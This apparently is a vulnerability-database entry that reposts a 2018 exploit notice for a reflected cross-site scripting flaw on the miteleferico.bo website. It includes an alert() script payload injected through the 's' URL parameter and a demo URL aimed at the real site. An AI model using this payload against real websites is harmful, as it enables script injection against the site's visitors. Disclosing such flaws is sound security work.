miteleferico - Cross Site Scripting ( XSS ) Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1035423 漏洞类型
发布时间 2018-03-19 更新时间 2018-03-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018030143
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit title: miteleferico  - Cross Site Scripting ( XSS ) Vulnerability
# Date: 2018-03-19
# Exploit Author: Elsfa7-110 ( mazoka433@gmail.com )
Vendor Homepage: https://www.miteleferico.bo
# Category: Web Application
# Dork: N/A
# =============================
# Description:
# I discovered a XSS vulnerability in miteleferico. This vulnerability allows bad guy executes javascript commands on 
# target. In this target, attacker can enter his javascript command through url. like this :
# http://Server/s=<script>alert("Elsfa7")</script>
#=============================
Demo :
# http://www.miteleferico.bo/?s=<script>alert("Elsfa7")</script>